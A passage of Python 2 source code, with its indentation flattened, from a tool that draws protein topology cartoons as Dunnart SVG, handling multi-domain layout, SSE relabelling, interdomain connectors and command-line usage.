# ensure we keep unique XML ids for any SVG objects we have to add
xmlid_generator = GenSeqId(current_domain.xmlid_generator.next())
# convert any pseudo terminus nodes to real terminus nodes if there
# are in fact no SSEs continuing that chain in another domain
# (FIXME: should fix build_graph_from_secstruct() so this doesn't happen
# in the first place but that is quite difficult as it currently stands)
interdomain_connector_list = []
if interdomain_connectors:
interdomain_connector_list = fixup_terminus_nodes(
list(positioned_domains),
xmlid_generator,
use_connector_arrowheads)
# relabel helices and strands so not restarting in each domain
# Note: also redoes coloring for color gradient color scheme
keep_domain_numbering = False # TODO: make this an option
if not keep_domain_numbering:
relabel_nodes_multidomain(list(positioned_domains),
sse_label_scheme,
color_scheme)
redo_sseseqnum_nodes_multidomain(list(positioned_domains))
# build the connectors between domains
if interdomain_connectors and len(positioned_domains) > 1:
interdomain_connector_list += build_interdomain_connectors(ptg_list,
xmlid_generator,
use_connector_arrowheads,
connector_color_scheme)
for connector in interdomain_connector_list:
connector.build_resname_sequence(ptg_list[0].residue_list,
ptg_list[0].pdb_resid_dict)
# For the 'chain' connector color scheme, redo the color of all connectors
# so that each chain has a different connector color
if connector_color_scheme[:5] == 'chain':
recolor_connectors_chain(ptg_list, interdomain_connector_list,
connector_color_scheme)
# Now write out all the SVG (order doesn't matter)
for ptg in positioned_domains:
ptg.write_dunnart_svg(outfilehandle)
if interdomain_connector_list:
for conn in interdomain_connector_list:
conn.write_svg(outfilehandle)
def fixup_terminus_nodes(ptg_list, xmlid_generator,
use_connector_arrowheads):
"""
convert any pseudo terminus nodes to real terminus nodes if there
are in fact no SSEs continuing that chain in another domain
(FIXME: should fix build_graph_from_secstruct() so this doesn't happen
in the first place but that is quite difficult as it currently stands)
Parameters:
ptg_list - list of PTGraph2 objects one per domain
xmlid_generator (IN/OUT) - GenSeqId object for generating XML ids
must be initizlied to start at the
next unused XML id.
use_connector_arrowheads - If True write arrowheads on connectors
indicating sequence direction from N- to C- terminus.
Only used for Dunnart.
Return value:
list of PTSVGConnector objects for connected added to terminus nodes
"""
conn_list = []
pseudoterm_list = [] # list of (node, ptg, nodelist) pseudo terminus nodes
# and the PTGraph2 to which it belongs, to convert
# to real terminus node
for i in range(len(ptg_list)):
ptg1 = ptg_list[i]
for chain1 in ptg1.iter_chains():
for termnode in [ chain1[0], chain1[-1] ]: # N and C terminus
if termnode.get_pseudo():
found_chain_other_domain = False
# print 'ccc checking',termnode
for j in range(len(ptg_list)):
ptg2 = ptg_list[j]
if ptg1 == ptg2:
continue
for chain2 in ptg2.iter_chains():
if (termnode.get_chainid() == chain2[0].get_chainid()
and ( (termnode.get_termtype() == 'C' and
get_int_icode(
chain2[0].get_start_res_seq())[0] >
get_int_icode(
termnode.get_end_res_seq())[0] - 2) or
(termnode.get_termtype() == 'N' and
get_int_icode(
chain2[-1].get_end_res_seq())[0] <
get_int_icode(
termnode.get_start_res_seq())[0] + 2) ) ):
# NB can be +-2 as +-1 'fake' resnum
found_chain_other_domain = True
# print 'bbb found chain in domain',ptg2.domainid,'for',termnode
break
if not found_chain_other_domain:
pseudoterm_list.append((termnode, ptg1, chain1))
for (pseudoterm, ptg, chain) in pseudoterm_list:
# this chain has no continuatino in another domain, so convert
# pseudo terminus node to a real terminus node, which involves
# positioning it
# print 'aaaa',pseudoterm
(xpos, ypos) = ptg.find_terminus_pos(pseudoterm, chain)
label = pseudoterm.get_termtype() +\
pseudoterm.get_chainid().lower()
pseudoterm.set_is_positioned(True)
pseudoterm.set_pseudo(False)
xmlid = xmlid_generator.next()
pseudoterm.set_svginfo(xmlid, xpos, ypos, label)
# now add connector from last SSE in the chain to the new terminus node
if pseudoterm.get_termtype() == 'C':
to_node = pseudoterm
from_node = ptg.get_most_cterm_visible_sse(chain)
# print 'ppp',from_node
srcFlags = from_node.get_empty_port()
dstFlags = DUNNART_DEFAULT_PORT
else: # 'N'
to_node = ptg.get_most_nterm_visible_sse(chain)
from_node = pseudoterm
# print 'ppp2',to_node
srcFlags = DUNNART_DEFAULT_PORT
dstFlags = to_node.get_empty_port()
linecolor = DUNNART_DEFAULT_LINE_COLOR
# linecolor may be overwritten later (e.g. for line color by chain)
xmlid = xmlid_generator.next()
conn_list.append(PTSVGConnector(xmlid,
from_node, to_node,
srcFlags, dstFlags,
linecolor,
use_connector_arrowheads))
return conn_list
def redo_sseseqnum_nodes_multidomain(ptg_list):
"""
Redo the sseseqnums on the helices and strands for multidomain
layout so that the sequential numbers are no longer restarting in
each domain. (Same as the 'sequential' labelling scheme).
Parameters:
ptg_list - list of PTGraph2 objects, one for each domain
Return value:
None
Raises exceptions:
TypeError if get other than PTSVGNodeHelix or PTSVGNodeStrand
from iter_helices() and iter_strands()
"""
# build a list of all visible helices and strands
# (note: not terminus nodes) in all domains, sorted by chain id
# and within chainid by residue sequence number (ascending)
nodelist = []
for ptg in ptg_list:
nodelist += list(ptg.iter_helices()) # skips 3/5 if not selected
nodelist += list(ptg.iter_strands())
nodelist.sort() # depends on PTNode comparison operators
# just label helices and strands in same sequence from 1,
# not restarting at chains
seqnum = 1
for node in nodelist:
node.sseseqnum = str(seqnum)
seqnum += 1
def relabel_nodes_multidomain(ptg_list, sse_label_scheme,
color_scheme):
"""
Relabel the helices and strands for multidomain layout so that
the labels are no longer restarting in each domain.
If the color scheme is the 'gradient' color scheme, then the
node colors are also redone so color gradient does not restart
in each domain.
Parameters:
ptg_list - list of PTGraph2 objects, one for each domain
sse_label_scheme - if 'sequential' number all nodes in one sequence
instead of sepearte sequences for strands and helices.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes (not available to
be used with GraphViz either).
color_scheme - 'none', 'simple', 'gradient', 'sheet', 'fold'
Return value:
None
Raises exceptions:
TypeError if get other than PTSVGNodeHelix or PTSVGNodeStrand
from iter_helices() and iter_strands()
"""
# build a list of all visible helices and strands
# (note: not terminus nodes) in all domains, sorted by chain id
# and within chainid by residue sequence number (ascending)
nodelist = []
for ptg in ptg_list:
nodelist += list(ptg.iter_helices()) # skips 3/5 if not selected
nodelist += list(ptg.iter_strands())
nodelist.sort() # depends on PTNode comparison operators
if sse_label_scheme == 'sequential':
# just label helices and strands in same sequence from 1,
# not restarting at chains
seqnum = 1
for node in nodelist:
node.label = str(seqnum)
if isinstance(node, PTNodeStrand) and node.get_barrel_edge():
node.label += '*' # TODO better way to mark barrel edges
seqnum += 1
elif sse_label_scheme == 'separate':
# label strands from 1, not restarting at each chain
# label helices A,B,etc. not restarting at each chain
# put lowercase chainid as suffix on each if multiple chains
multiple_chains = False
chainid_dict = {} # dict of {chainid:True} to find distinct chainids
for ptg in ptg_list:
if ptg.num_chains() > 1:
multiple_chains = True
break
else:
chainid = list(ptg.iter_chains())[0][0].get_chainid()
if not chainid_dict.has_key(chainid):
chainid_dict[chainid] = True
if not multiple_chains and len(chainid_dict) > 1:
multiple_chains = True
strand_num = 1
helix_num = 1
for node in nodelist:
if isinstance(node, PTSVGNodeStrand):
label = str(strand_num)
if node.get_barrel_edge():
label += '*' # TODO better way to mark barrel edges
strand_num += 1
elif isinstance(node, PTSVGNodeHelix):
# helices are labelled 'A', 'B', etc. by convention
# FIXME: should go to AA, AB, etc. if more than 26
label = chr(ord('A')-1 + helix_num)
helix_num += 1
else:
raise TypeError('unhandled node type')
if multiple_chains:
label = label + str(node.get_chainid()).lower()
node.label = label
# if multiple chains, put chain suffix on N and C term nodes also
if multiple_chains:
for ptg in ptg_list:
for chain in ptg.iter_chains():
assert(chain[0].get_termtype() == 'N')
assert(chain[-1].get_termtype() == 'C')
if not chain[0].get_pseudo():
chain[0].label = 'N' + chain[0].get_chainid().lower()
if not chain[-1].get_pseudo():
chain[-1].label = 'C' + chain[-1].get_chainid().lower()
else: # label scheme is 'none'
label = ''
# Also redo the node colors, from blue to red along whole protein
# (across domains and chains)
# FIXME: this is not consistent with single domain mode, where
# colr restarts for each chain - should change one or the other
# to be consistent (probably this way, ie not restarting at each chain,
# is best, as it is what PyMOL does?)
if color_scheme == 'gradient':
rgb_list = list(color_gradient(len(nodelist)))
assert(len(rgb_list) == len(nodelist))
for i in range(len(nodelist)):
nodelist[i].set_color(rgb_list[i])
i += 1
# color each terminus node the same color as its visible neighbour
for ptg in ptg_list:
for chain in ptg.iter_chains():
nterm = chain[0]
cterm = chain[-1]
assert(nterm.get_termtype() == 'N')
assert(cterm.get_termtype() == 'C')
nterm.set_color(
ptg.get_most_nterm_visible_sse(chain).get_color())
cterm.set_color(
ptg.get_most_cterm_visible_sse(chain).get_color())
def build_interdomain_connectors(ptg_list,
xmlid_generator,
use_connector_arrowheads,
connector_color_scheme):
"""
Build connectors between domains in a multidomain cartoon.
For each pair of domains, we need to go through each pair of chains
(one from each domain), and for chains that are split between the
domains (i.e. the same chainid is in both domains) which will have
a pseudo-terminus that has not been drawn, then make a connector
from the most N-terminal SSE in the one domain to the most C-terminal
SSE in the other domain.
Parameters:
ptg_list - list of PTGraph2 objects, one per domain
xmlid_generator (IN/OUT) - GenSeqId object for generating XML ids
must be initizlied to start at the
next unused XML id.
use_connector_arrowheads - If True write arrowheads on connectors
indicating sequence direction from N- to C- terminus.
Only used for Dunnart.
connector_color_scheme - 'all[:<color>]', 'chain[:<color_list>]',
'domain[:<intra_color>,<inter_color>]',
'crossing[:<color_list>]'
Return value:
List of PTSVGConnector objects from interdomain connectors
"""
# FIXME this is all rather inefficient and inelegant, should probably
# do this better by marking things in build_graph_from_secstruct()
# or in relabel_nodes_multidomain()
# but ineficciency not very important due to small number of domains/chains
# first build list of connected domains, which are ones that
# have the same chainid and the pseudo-terminus nodes have the closest
# residue sequence ids (so that if we have eg 3 domains and one chain,
# there will only be two connections, between each pair with consecutive
# (though note not exactly consectuive, since only SSEs have nodes)
# residue seqwuence numbers, not between all 3 domains).
domcon_dict = {} # dict of {chainid: (domainid1, domaind2)}
for i in range(len(ptg_list)):
ptg1 = ptg_list[i]
for chain1 in ptg1.iter_chains():
min_seqnum_diff = sys.maxint
min_snd_domainid = None
for j in range(i + 1, len(ptg_list)):
ptg2 = ptg_list[j]
for chain2 in ptg2.iter_chains():
if chain1[0].get_chainid() == chain2[0].get_chainid():
if chain1[0].get_pseudo() and chain2[-1].get_pseudo():
seqnum_diff = get_int_icode(
chain1[0].get_start_res_seq())[0] - \
get_int_icode(
chain2[-1].get_end_res_seq())[0]
# print 'iii',chain1[0],chain2[-1]
elif chain1[-1].get_pseudo() and chain2[0].get_pseudo():
seqnum_diff = get_int_icode(
chain2[0].get_start_res_seq())[0] - \
get_int_icode(
chain1[-1].get_end_res_seq())[0]
# print 'jjj',chain2[0],chain1[-1]
else: # cannot have both N or both C ends psuedo-termini
assert(False)
assert(seqnum_diff >= -2) # NB can be -2 as +-1 'fake' resnum
# print 'ttt',ptg1.domainid,ptg2.domainid,seqnum_diff
if seqnum_diff < min_seqnum_diff:
min_seqnum_diff = seqnum_diff
min_snd_domainid = ptg2.domainid
if min_snd_domainid != None:
if domcon_dict.has_key(chain1[0].get_chainid()):
domcon_dict[chain1[0].get_chainid()].append(
(ptg1.domainid, min_snd_domainid))
else:
domcon_dict[chain1[0].get_chainid()] = \
[ (ptg1.domainid, min_snd_domainid) ]
# print 'zzzzz',domcon_dict
conn_list = []
for i in range(len(ptg_list)):
ptg1 = ptg_list[i]
for j in range(i + 1, len(ptg_list)):
ptg2 = ptg_list[j]
for chain1 in ptg1.iter_chains():
for chain2 in ptg2.iter_chains():
assert(chain1[0].get_termtype() == 'N')
assert(chain1[-1].get_termtype() == 'C')
assert(chain2[0].get_termtype() == 'N')
assert(chain2[-1].get_termtype() == 'C')
if (chain1[0].get_chainid() == chain2[0].get_chainid() and
(ptg1.domainid, ptg2.domainid) in
domcon_dict[chain1[0].get_chainid()]):
if chain1[0].get_pseudo() and chain2[-1].get_pseudo():
k = len(chain2)-2
from_node = chain2[k]
while k > 0 and not from_node.get_is_positioned():
k -= 1
from_node = chain2[k]
k = 1
to_node = chain2[k]
while (k < len(chain2) and
not to_node.get_is_positioned()):
k += 1
to_node = chain1[1]
elif chain1[-1].get_pseudo() and chain2[0].get_pseudo():
k = len(chain1) - 2
from_node = chain1[k]
while k > 0 and not from_node.get_is_positioned():
k -= 1
from_node = chain1[k]
k = 1
to_node = chain2[k]
while (k < len(chain2) and
not to_node.get_is_positioned()):
k += 1
to_node = chain2[k]
else: # cannot have both N or both C ends psuedo-termini
assert(False)
srcFlags = from_node.get_empty_port()
dstFlags = to_node.get_empty_port()
if connector_color_scheme[:6] == 'domain':
if ':' in connector_color_scheme:
linecolor = get_connector_colors(
connector_color_scheme)[1]
else:
# no colors specified; make
# interdomain connectors the last
# color in list
linecolor = DUNNART_LINE_COLORS[-1]
else: # will be overwritten later for 'chain'
if (connector_color_scheme[:4] == 'all:' or
connector_color_scheme[:9] == 'crossing:'):
linecolor=get_connector_colors(
connector_color_scheme)[0]
else:
linecolor = DUNNART_DEFAULT_LINE_COLOR
xmlid = xmlid_generator.next()
conn_list.append(PTSVGConnector(xmlid,
from_node, to_node,
srcFlags, dstFlags,
linecolor,
use_connector_arrowheads)
)
return conn_list
def recolor_connectors_chain(ptg_list, interdomain_connector_list,
connector_color_scheme):
"""
Redo the connector coloring in the chase of 'chain' coloring
so that each chain has a different color (since with multiple domains
may have different chains in different domains, that were colored
the same color when operating one domain at a time).
Parameters:
ptg_list - list of PTGraph2 objects one per domain
interdomain_connector_list - list of PTSVGConenctor objects for
connectors between domains
connector_color_scheme - 'chain[:<color_list>]'
NOTE: modifies the color data in objects in the lists
Return value:
None
"""
assert(connector_color_scheme[:5] == 'chain')
if ':' in connector_color_scheme: # color list specified
color_list = get_connector_colors(connector_color_scheme)
else: # use default line colors list
color_list = DUNNART_LINE_COLORS
# build dictionary mapping each distinct chainid to index in list
# of line colors
chainid_colorindex_dict = {} # dict of {chainid:colorindex}
colorindex = 0
for ptg in ptg_list:
for chain in ptg.iter_chains():
chainid = chain[0].get_chainid()
if not chainid_colorindex_dict.has_key(chainid):
chainid_colorindex_dict[chainid] = colorindex
colorindex = (colorindex + 1) % len(color_list)
if verbose:
sys.stderr.write('chain colors: ' + str(chainid_colorindex_dict) +'\n')
# recolor each connector with its appropriate color for chain now
# intradomain connectors
for ptg in ptg_list:
for conn in ptg.svg_connector_list:
chainid = conn.src.get_chainid()
assert(conn.dest.get_chainid() == chainid) # src,dst same chain
conn.color = color_list[chainid_colorindex_dict[chainid]]
# and interdomain connectors
for conn in interdomain_connector_list:
chainid = conn.src.get_chainid()
assert(conn.dest.get_chainid() == chainid) # src,dst same chain
conn.color = color_list[chainid_colorindex_dict[chainid]]
def build_one_dunnart_svg_domain(ptg, outfilename,
sse_label_scheme,
use_connector_arrowheads,
heuristic_helix_placement,
sheet_shading_colors,
enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
connector_color_scheme,
color_scheme,
helix_proximity_shading_colors,
initial_xmlid,
main_sideways,
main_reversed,
interdomain_connectors=False,
use_scaling = False,
label_residue_numbers=False):
"""
Build Dunanrt SVG in the Ptgraph2 object for a single domain
(already with constraints built, etc.)
Parameters:
ptg (read/write) - the PTGraph2 object to build the SVG in.
outfilename - filename for verbose message text only, not opened.
sse_label_scheme - if 'sequential' number all nodes in one sequence
instead of sepearte sequences for strands and helices.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes (not available to
be used with GraphViz either).
use_connector_arrowheads - If True write arrowheads on connectors
indicating sequence direction from N- to C- terminus.
Only used for Dunnart.
heuristic_helix_placement - use the original heuristic helix placement
instead of trying to place helices according to distance
matrix information.
sheet_shading_colors - None (use default shade for all) or
'auto' (use color gradient to shade each
differently) or list of colors.
enable_sheet_gap_rule - If True and using herusistic helix placement,
don't put 'too long' helices between sheets that are
neighbours.
use_helix_clustering - If True and using heuristic helix placement,
cluster sequential helices and place in cluster
with tableau and distance matrix rather than
aligning them all on strand axis.
helix_cluster_shading_color - color to shade helix clusters
connector_color_scheme - 'none','chain','domain'
color_scheme - 'none', 'simple', 'gradient', 'sheet', 'fold'
helix_proximity_shading_colors - If not None & using helix clustering,
shade nearby helix clusters the same
color: 'auto' (use color gradient
to shade each differently),
or list of colors.
intitial_xmlid - XML identifier to start at
main_sideways - if True, the 'main' part of the domain (largest sheet
or longest helix) is drawn sideways instead of vertical
main_reversed - If True, the main part (as above) is drawn reversed
(down not up, or right not left when sideways)
interdomain_connectors - If True, do NOT make pseduo-terminus nodes
at domain boundaries. Instead the domain boundary
SSEs are left ot hve connectors to other domain
added later. Default False.
use_scaling - if True use uniform scaling as primitive way to
remove overlaps before dunnart processing.
label_residue_numbers - if True put start and end residue ids
on head and tail of helix shape
Return value:
None.
"""
# if this is an alpha-only domain then always use the
# distance-matrix based helix placement algorithm as the
# heristic ('old') algorithm requires at least one beta sheet
domain_heuristic_helix_placement = heuristic_helix_placement
if len(ptg.sheet_dict) == 0:
if heuristic_helix_placement:
sys.stderr.write('Alpha-only domain; '
'distance matrix helix placement used '
'for this domain (' + outfilename + ')\n')
domain_heuristic_helix_placement = False
if verbose:
sys.stderr.write('Building SVG for ' + outfilename)
if ptg.domainid != None:
sys.stderr.write(' domain ' + ptg.domainid + '\n')
else:
sys.stderr.write('\n')
ptg.build_dunnart_svg(sse_label_scheme,
use_connector_arrowheads,
domain_heuristic_helix_placement,
sheet_shading_colors,
enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
connector_color_scheme,
color_scheme,
helix_proximity_shading_colors,
initial_xmlid,
main_sideways,
main_reversed,
interdomain_connectors,
label_residue_numbers
)
if use_scaling:
ptg.scale(SCALE_FACTOR)
def make_graphs(pdb_filename,
domain_program,
secstruct_program,
use_dot=False, use_neato=False, use_hbonds=False,
use_dunnart_auto=False,
sse_label_scheme = 'separate',
use_connector_arrowheads=False,
connector_color_scheme = 'all',
heuristic_helix_placement=False,
use_tableaucreator = True,
include_310_helices = False,
include_pi_helices = False,
write_mfiles = False,
use_pdb_secstruct = False,
sheet_shading_colors = None,
color_scheme = 'none',
enable_sheet_gap_rule = False,
use_helix_clustering = False,
helix_cluster_shading_color = None,
helix_proximity_shading_colors = None,
multidomain_cartoon = True,
interdomain_connectors = False,
use_scaling = False,
write_pmlfile = False,
orig_pdbfilename = None,
label_residue_numbers = False):
"""
For the supplied filemame, read PDB format data from that file
and create and write out a graph for the structure read.
Paramteters:
pdb_filename - filename of PDB file to read
domain_program - domain parsing program ("none" or "ddomain"
or "cath:cath_cdf_filename") to use
secstruct_program - secondary structure definition program
('stride' or 'dssp') to use.
use_dot - If True use dot from GraphViz to make PostScript output
use_neato - If True use neato from GraphViz to make PostScript output
use_hbonds - If True make hydrogen bond graph instead of using
bridge partner information to make
sheets from strands.
use_dunnart_auto - If True use automatic graph layout in Dunnart
sse_label_scheme - if 'sequential' number all nodes in one sequence
instead of sepearte sequences for strands and helices.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes (not available to
be used with GraphViz either).
use_connector_arrowheads - If True write arrowheads on connectors
indicating sequence direction from N- to C- terminus.
Only used for Dunnart.
connector_color_scheme - 'all','none','chain','domain','crossing'
(see main)
heuristic_helix_placement - use the original heuristic helix placement
instead of trying to place helices according to distance
matrix information.
use_tableaucreator - if True, use TableauCreator to get angles
between SSEs.
include_310_helices - if True, include 3_10 helices in the diagram
include_pi_helices - if True, include pi helices in the diagram
write_mfiles - if True, write MATLAB m-files to plot strands and axes.
use_pdb_secstruct - Use HELIX and SHEET cards in PDB.
sheet_shading_colors - None (use default shade for all) or
'auto' (use color gradient to shade each
differently) or list of colors.
color_scheme - 'none', 'simple[:sheet_color,helixcluster_color]',
'gradient', 'sheet', 'fold'
enable_sheet_gap_rule - If True and using herusistic helix placement,
don't put 'too long' helices between sheets that are
neighbours.
use_helix_clustering - If True and using heuristic helix placement,
cluster sequential helices and place in cluster
with tableau and distance matrix rather than
aligning them all on strand axis.
helix_cluster_shading_color - color to shade helix clusters
helix_proximity_shading_colors - If not None & using helix clustering,
shade nearby helix clusters the same
color: 'auto' (use color gradient
to shade each differently),
or list of colors.
multidomain_cartoon - If True, still build PTGraph2 for each domain
separately, but then place all domains on the
same drawing rather than one per file.
interdomain_connectors - If True and using multidomain cartoons,
draw connectors between domains instead of
the pseudo-terminus nodes use normally.
use_scaling - If True, use uniform scaling as primitive way of
avoiding overlaps before dunnart processing.
write_pmlfile - If True, write PyMOL .pml command file to load
structure and define SSEs according to
the method we used.
The filename of the .pml file will be PDBID.pml
where PDBID.pdb was the input file.
orig_pdbfilename - input PDB filename (may be compressed; the
pdb_filename is our uncompressed copy)
label_residue_numbers - if True put start and end residue ids
on head and tail of helix shape
Writes .ps or .svg files named as per description in main() below
WARNING: overwrites these .ps or .svg files
Note this handles PDB filenames both in the 1QLP.pdb or
pdb1qlp.ent format, but in eithe rcase the output file is in the 1QLP.svg
format.
Return value: None
"""
if use_pdb_secstruct:
pdb_secstruct = ptsecstruct.read_secstruct_from_pdb_file(pdb_filename)
if pdb_secstruct == None:
sys.stderr.write('WARNING: error with HELIX or SHEET cards in PDB'
': ' + secstruct_program +
' will be used instead\n')
else:
pdb_secstruct = None
# read secondary structure and H bond information from STRIDE or DSSP,
# or only read hydrogen bond information from them if already have
# secondary structure from PDB HELIX and SHEET cards.
if secstruct_program == "stride":
secstruct = ptsecstruct.read_secstruct_from_stride(pdb_filename,
pdb_secstruct)
else:
secstruct = ptsecstruct.read_secstruct_from_dssp(pdb_filename,
pdb_secstruct)
pdb_file_basename = os.path.basename(pdb_filename)
(name,extension) = os.path.splitext(pdb_file_basename)
if extension.lower() == ".ent" and name[0].lower() == "d":
# An ASTRAL/SCOP pdbstyle file such as d1apaa_.ent,
# we will use in this case e.g. d1apaa_ as the 'pdbid'
pdbid = name
is_astral = True
else: # a regular PDB file
try:
pdbid = secstruct.pdb_id.lstrip()
except AttributeError: # no PDB id, try to use filename instead
pdbid = name
is_astral = False
# write PyMOL command file to load structure and show SSEs if requested
if write_pmlfile:
pmlfilename = pdbid + '.pml'
sys.stdout.write('writing file ' + pmlfilename + '\n')
pmlfile_fh = open(pmlfilename, 'w')
secstruct.write_pymol_sse_commands(pmlfile_fh, orig_pdbfilename)
pmlfile_fh.close()
pdb_parser = PDBParser()
pdb_struct = pdb_parser.get_structure(pdbid, pdb_filename) # parse PDB file
if is_astral:
# ASTRAL/SCOP pdbstyle file is for a single SCOP domain, so makes
# no sense to do domain decomposition
domain_list = [PTDomain(None, None)] # 'single domain' indicator
if domain_program != "none":
sys.stderr.write("WARNING: domain decomposition not run "
"as input file detected as an "
"ASTRAL/SCOP domain.\n")
else:
if domain_program == "none":
domain_list = [PTDomain(None, None)] # 'single domain' indicator
elif domain_program[0:5] == "cath:":
cdf_filename = domain_program[5:]
try:
domain_list = read_domains_from_cath_cdf_file(cdf_filename, pdbid)
except NotInCATH_Exception:
sys.stderr.write('WARNING: PDB identifier ' + pdbid +
' not found in CDF file.')
sys.stderr.write(' Treating as single domain.\n')
domain_list = [PTDomain(None, None)]
else:
domain_list = read_domains_from_ddomain(pdb_filename,
pdb_struct[0]) # TODO: model 0
# Sometimes DDOMAIN seems to give domain decompositions that do not
# make sense, i.e. have domains nested one inside the other.
# This happens for example with 2RH1. We will check for this and
# if it happens just ignore the decomposition, making a single domain.
domain_cd = build_domain_chaindict(domain_list)
if not verify_domain_disjoint(domain_list, domain_cd):
sys.stderr.write('WARNING: DDOMAIN domain decomposition is ' +
'inconsistent. Treating as single domain.\n')
domain_list = [PTDomain(None, None)]
# NOTE: if there is only one domain, we will make it a list
# with a single PTDomain with all data None, signifying a
# single domain protein with no further information. This is
# mainly because of when there are multiple chains, in which
# case the single domain is reported by DDOMAIN as having a
# different chain id for start and end. If there is a single
# domain we really don't want to do anything special, so it is
# better to just have it as a special case where no domain
# processing is done.
if len(domain_list) == 1:
domain_list = [PTDomain(None, None)]
elif len(domain_list) == 0:
# This happens if DDomain crashes for example (e.g. on 1PPJ)
sys.stderr.write("WARNING: no domain decomposition from DDOMAIN."
" Treating as single domain.\n")
domain_list = [PTDomain(None, None)]
# output the domain decomposition in a more or less conventional format
if len(domain_list) > 1:
sys.stdout.write("domain decomposition: ")
for i in range(len(domain_list)):
sys.stdout.write(str(domain_list[i]))
if i < len(domain_list) - 1:
sys.stdout.write('/')
sys.stdout.write(' (' + domain_program + ')\n')
# for SSEs that cross domain boundaries, move whole SSE to one of the domains
fixup_crossdomain_sses(secstruct, domain_list)
initial_xmlid = 1
ptg_list = [] # list of PTGraph2 objects, one for each domain
for domain in domain_list:
ptg = PTGraph2(pdb_struct, use_hbonds,
include_310_helices, include_pi_helices)
# build PTGraph2 from secondary structure and H bonds for this domain
try:
ptg.build_graph_from_secstruct(secstruct, domain)
except NoSSE_Exception:
if domain.domainid == None:
domidext = ''
else:
domidext = '-' + domain.domainid
sys.stderr.write('WARNING: No helices or strands found in domain ' +
pdbid + domidext +
': no output written\n')
continue
# find sheets as connected components & label strands
ptg.label_sheets()
# write MATLAB m-files to plot strands in each sheet if requierd
if write_mfiles:
if domain.domainid == None:
domainid = "1"
else:
domainid = domain.domainid
ptg.write_sheet_mfiles(pdbid, domainid)
ptg.write_helix_mfiles(pdbid, domainid)
# build the PTDistMatrix distance maps for this domain
ptg.build_dist_matrix(domain)
# build the PTTableau tableau
ptg.build_tableau(pdbid, domain, use_tableaucreator)
# build layout constraints
ptg.build_constraints()
# label nodes with color
ptg.set_node_colors(color_scheme)
# build a graph diagram from it
if len(domain_list) > 1:
outfilename = pdbid + '-' + domain.domainid
else:
outfilename = pdbid
if (use_dot or use_neato):
# use GraphViz to make PostScript output file
dg = ptgraphviz.make_graphviz_graph(ptg)
outfilename += '.ps'
if use_dot:
progname = "dot"
else:
progname = "neato"
sys.stdout.write('writing file ' + outfilename + '\n')
dg.write_ps(outfilename,prog=progname) # or use ps2 not ps to make pdf later
elif not multidomain_cartoon:
# Build SVG objects with graph and constraints for Dunnart
build_one_dunnart_svg_domain(ptg, outfilename,
sse_label_scheme,
use_connector_arrowheads,
heuristic_helix_placement,
sheet_shading_colors,
enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
connector_color_scheme,
color_scheme,
helix_proximity_shading_colors,
initial_xmlid,
False, # main_sideways
False, # main_reversed
False, # interdomain_connectors
use_scaling,
label_residue_numbers)
ptg_list.append(ptg)
# END of iteration over domain_list
if not (use_dot or use_neato):
# write the domains out, or build each one then write them out
# for multidomain (need to do one at a time to use orientation relative
# to previous one for each one)
if connector_color_scheme[:8] == "crossing":
color_interfering_connectors = True
else:
color_interfering_connectors = False
if multidomain_cartoon:
if len(ptg_list) > 0:
outfilename = pdbid + '.svg'
sys.stdout.write('writing file ' + outfilename + '\n')
outfilehandle = open(outfilename, 'w')
write_dunnart_svg_prelude(outfilehandle, outfilename,
pdbid,
len(ptg_list),
len(domain_list),
color_interfering_connectors,
connector_color_scheme,
use_dunnart_auto)
write_dunnart_svg_domains(outfilehandle, outfilename,
ptg_list, pdb_struct,
sse_label_scheme,
use_connector_arrowheads,
heuristic_helix_placement,
sheet_shading_colors,
enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
connector_color_scheme,
color_scheme,
helix_proximity_shading_colors,
interdomain_connectors,
use_scaling,
label_residue_numbers)
write_dunnart_svg_conclusion(outfilehandle)
outfilehandle.close()
else:
for ptg in ptg_list: # one PTGraph2 object per domain
if len(domain_list) > 1:
outfilename = pdbid + '-' + ptg.domainid
else:
outfilename = pdbid
outfilename += '.svg'
sys.stdout.write('writing file ' + outfilename + '\n')
outfilehandle = open(outfilename, 'w')
write_dunnart_svg_prelude(outfilehandle, outfilename,
pdbid,
1,
len(domain_list),
color_interfering_connectors,
connector_color_scheme,
use_dunnart_auto)
ptg.write_dunnart_svg(outfilehandle)
write_dunnart_svg_conclusion(outfilehandle)
outfilehandle.close()
def get_min_gap_size():
"""
Return the value of the Dunnart minimum gap size
"""
global DUNNART_MIN_GAP_SIZE
return DUNNART_MIN_GAP_SIZE
def get_strand_separation():
"""
Return the value fo the Dunnart strand separation
"""
global DUNNART_STRAND_SEPARATION
return DUNNART_STRAND_SEPARATION
def set_strand_gap(gapsize):
"""
Set the value of the Dunnart strand separation and min gap size
"""
global DUNNART_STRAND_SEPARATION
global DUNNART_MIN_GAP_SIZE
DUNNART_STRAND_SEPARATION = gapsize
DUNNART_MIN_GAP_SIZE = gapsize
def usage(progname):
"""
Print usage message and exit
"""
sys.stderr.write("Usage: " + progname +
" [-35acdnhrmvixgqzuwy]"
" [ -o sse_color_scheme] [ -l connector_color_scheme ] "
" [ -b sse_label_scheme ] "
" [ -k <color> ]"
" [ -g <separation> ]"
" [ -e <color_list>|auto ] [ -f <color_list>|auto ]"
" [-p domain_prog] [-t struct_prog] PDBfile\n")
sys.stderr.write(" -3 include 3_10 helices in diagram\n")
sys.stderr.write(" -5 include pi helices in diagram\n")
sys.stderr.write(" -a use Dunnart automatic graph layout\n")
sys.stderr.write(" -c use HELIX and SHEET cards from PDB file\n")
sys.stderr.write(" -d use GraphViz dot instead of Dunnart SVG\n")
sys.stderr.write(" -n use GraphViz neato instead of Dunnart SVG\n")
sys.stderr.write(" -p domain_prog : use domain_prog to parse domains\n")
sys.stderr.write(" supported is 'none' or 'ddomain' (default)\n")
sys.stderr.write(" or 'cath:cdf_file_name'\n")
sys.stderr.write(" -h graph hydrogen bonds with GraphViz\n")
sys.stderr.write(" -b SSE labelling scheme: 'none', 'sequential', 'separate' (default)\n")
sys.stderr.write(" -t struct_prog : use struct_prog define " \
"secondary structure\n")
sys.stderr.write(" supported is 'stride' or 'dssp' (default)\n")
sys.stderr.write(" -r compute angles internally, not with external TableauCreator\n")
sys.stderr.write(" -m write MATLAB M-files to plot strand axes\n")
